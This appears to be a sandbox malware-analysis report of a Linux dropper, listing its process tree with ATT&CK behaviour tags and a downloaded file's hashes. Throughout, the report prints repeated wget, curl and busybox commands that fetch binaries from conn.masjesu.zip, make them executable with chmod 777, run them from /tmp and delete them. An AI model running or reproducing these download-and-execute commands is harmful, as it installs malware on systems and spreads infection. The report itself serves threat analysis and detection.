/tmp/wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP./wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵
- Executes dropped EXE
PID:939
-
-
/bin/rmrm wJcz1jyZOjDsozyd5IS38hIDZDj7Uh1OCP2⤵PID:940
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵
- System Network Configuration Discovery
PID:941
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:942
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵
- System Network Configuration Discovery
PID:944
-
-
/bin/chmodchmod 777 v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN./v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm v7uTmFOL4HT74EjAK3fgGzkI0RDsbTenkN2⤵PID:947
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵PID:948
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵
- System Network Configuration Discovery
PID:951
-
-
/bin/chmodchmod 777 mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵
- File and Directory Permissions Modification
PID:952
-
-
/tmp/mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF./mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵
- Executes dropped EXE
PID:953
-
-
/bin/rmrm mOZslaPet6PwQG4et9BWCpbfJtqLmkSomF2⤵PID:954
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵
- System Network Configuration Discovery
PID:955
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:956
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵
- System Network Configuration Discovery
PID:958
-
-
/bin/chmodchmod 777 R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵
- File and Directory Permissions Modification
PID:959
-
-
/tmp/R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk./R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm R9h1DWV4s6z4Of7Wsonc16J1aGCFZj6BFk2⤵PID:961
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵
- System Network Configuration Discovery
PID:962
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:963
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵PID:965
-
-
/bin/chmodchmod 777 RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵
- File and Directory Permissions Modification
PID:966
-
-
/tmp/RST5ihgvCHq053iGjxnCyKylug69j9npai./RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵
- Executes dropped EXE
PID:967
-
-
/bin/rmrm RST5ihgvCHq053iGjxnCyKylug69j9npai2⤵PID:968
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵PID:969
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:970
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵
- System Network Configuration Discovery
PID:972
-
-
/bin/chmodchmod 777 RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo./RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm RxOHWJFgUEyrZWVU6gkJBJs9ThXN24DjZo2⤵PID:975
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵PID:976
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:977
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- System Network Configuration Discovery
PID:979
-
-
/bin/chmodchmod 777 7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- File and Directory Permissions Modification
PID:980
-
-
/tmp/7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm6./7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:981
-
-
/bin/rmrm 7go70Vx0Jy1EB6qW8YD4IPgDEYlw2mDYm62⤵
- System Network Configuration Discovery
PID:982
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵PID:983
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:984
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵
- System Network Configuration Discovery
PID:986
-
-
/bin/chmodchmod 777 oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵
- File and Directory Permissions Modification
PID:987
-
-
/tmp/oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK./oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵
- Executes dropped EXE
PID:988
-
-
/bin/rmrm oBQOkJVarQtrrvsgoAax0BwuWUzVLq6BlK2⤵PID:989
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha2⤵
- System Network Configuration Discovery
PID:990
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:991
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha2⤵
- System Network Configuration Discovery
PID:993
-
-
/bin/chmodchmod 777 3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha2⤵
- File and Directory Permissions Modification
PID:994
-
-
/tmp/3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha./3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha2⤵
- Executes dropped EXE
PID:995
-
-
/bin/rmrm 3D4TYTodiGBymv9iv1KWoyRU90x1ljhWha2⤵PID:996
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵
- System Network Configuration Discovery
PID:997
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:998
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵
- System Network Configuration Discovery
PID:1000
-
-
/bin/chmodchmod 777 0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵
- File and Directory Permissions Modification
PID:1001
-
-
/tmp/0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK./0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵
- Executes dropped EXE
PID:1002
-
-
/bin/rmrm 0w6Xw42OWClMI6tqEWNIRX0twXp6LS1bVK2⤵PID:1003
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97